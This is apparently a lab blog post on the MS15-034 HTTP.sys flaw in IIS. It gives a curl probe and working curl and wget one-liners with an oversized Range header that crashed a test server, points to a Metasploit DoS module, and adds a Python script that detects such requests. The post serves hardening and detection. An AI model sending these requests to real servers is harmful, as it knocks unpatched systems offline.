ref: https://isc.sans.edu/forums/diary/MS15034+HTTPsys+IIS+DoS+And+Possible+Remote+Code+Execution+PATCH+NOW/19583/
Here is a simple demonstration.
Attacker: Kali Linux
Victim: Windows Server 2008 R2, IIS 7.5 (192.168.182.154)
1. Use a curl command to test whether the server is vulnerable:
curl -v 192.168.182.154/ -H "Host: test" -H "Range: bytes=0-18446744073709551615"
If the response is "Requested Range Not Satisfiable" (HTTP 416), the server may be vulnerable. This probe only checks; it does not crash the server.
2. If the server seems to be vulnerable, changing the Range to "Range: bytes=18-18446744073709551615" can cause a DoS / BSOD of the server. Let's try a simple wget command that requests an existing resource, "welcome.png".
For curl, the same request works even without quotes around the Range header (it probably just freezes the system rather than producing a BSOD):
curl -v "192.168.182.154/welcome.png" -H Range:bytes=18-18446744073709551615
Command: wget --header="Range: bytes=18-18446744073709551615" http://192.168.182.154/welcome.png
With the wget request, our victim crashed with a BSOD :-(....
After the reboot it gave another BSOD (although sometimes it didn't BSOD again after rebooting).
Edited: The second BSOD is most likely because wget keeps retrying the request, so once the system is booted up again it accepts the request and crashes again. Thanks to my friend for the explanation.
3. Metasploit's module can also achieve the DoS.
ref: http://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongadd
As soon as the module is executed, the server goes down... (I wasn't fast enough to capture it on the first attempt, so there are two trials :)...)
From the above demonstration we can see how easily the server can be brought down. Time to review and harden your IIS servers, my friends~
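To help with the "review" part, here is an added detection example (my own code, not from the ISC diary or the Metasploit module). It scans raw HTTP request headers for Range values shaped like the MS15-034 probe and DoS requests shown above, i.e. a byte offset of 18446744073709551615 (2^64 - 1) or any other bound that cannot be a real file offset. Assumptions: the threshold MAX_SANE_OFFSET (anything above the signed 64-bit maximum is treated as hostile) is my heuristic, and the request texts are constructed samples; IIS logs do not record the Range header by default, so in practice the input would come from a reverse proxy, WAF or packet capture in front of the server.

```python
import re

# Heuristic threshold (assumption): no legitimate resource is addressed by a
# byte offset above the signed 64-bit maximum. The MS15-034 requests use an
# end offset of 18446744073709551615 (2**64 - 1), far beyond this.
MAX_SANE_OFFSET = 2**63 - 1

RANGE_RE = re.compile(r"^\s*bytes\s*=\s*(.+)$", re.IGNORECASE)


def parse_byte_ranges(value):
    """Parse a Range header value ("bytes=a-b, c-, -d") into (first, last)
    tuples. A missing bound (open-ended or suffix range) becomes None."""
    m = RANGE_RE.match(value)
    if not m:
        return []
    ranges = []
    for spec in m.group(1).split(","):
        spec = spec.strip()
        if "-" not in spec:
            continue
        first, last = spec.split("-", 1)
        first = int(first) if first.strip().isdigit() else None
        last = int(last) if last.strip().isdigit() else None
        ranges.append((first, last))
    return ranges


def is_suspicious_range(value):
    """True when any bound exceeds MAX_SANE_OFFSET or a range ends before it
    starts; both are malformed for a real download and match the MS15-034 shape."""
    for first, last in parse_byte_ranges(value):
        for bound in (first, last):
            if bound is not None and bound > MAX_SANE_OFFSET:
                return True
        if first is not None and last is not None and last < first:
            return True
    return False


def scan_requests(raw_requests):
    """raw_requests: iterable of raw HTTP request header blocks (CRLF or LF).
    Returns a list of (request_line, range_value) for flagged requests."""
    flagged = []
    for raw in raw_requests:
        lines = raw.replace("\r\n", "\n").split("\n")
        request_line = lines[0].strip()
        for header in lines[1:]:
            name, sep, val = header.partition(":")
            if sep and name.strip().lower() == "range" and is_suspicious_range(val.strip()):
                flagged.append((request_line, val.strip()))
                break
    return flagged


# Constructed sample traffic: the probe and the DoS request from the post,
# plus three benign requests (normal range, suffix range, no Range at all).
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: test\r\nRange: bytes=0-18446744073709551615\r\n\r\n",
    "GET /welcome.png HTTP/1.1\r\nHost: 192.168.182.154\r\n"
    "Range: bytes=18-18446744073709551615\r\n\r\n",
    "GET /video.mp4 HTTP/1.1\r\nHost: example.test\r\nRange: bytes=0-1023\r\n\r\n",
    "GET /big.iso HTTP/1.1\r\nHost: example.test\r\nRange: bytes=-500\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n",
]

if __name__ == "__main__":
    for request_line, rng in scan_requests(SAMPLE_REQUESTS):
        print("ALERT possible MS15-034 request: %s  Range: %s" % (request_line, rng))
```

Running it flags the first two sample requests and leaves the three benign ones alone. A rule of the same shape (Range bound greater than 2^63 - 1) can be dropped into a WAF or IDS in front of IIS until the patch is applied.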
Nice write-up :)
Like !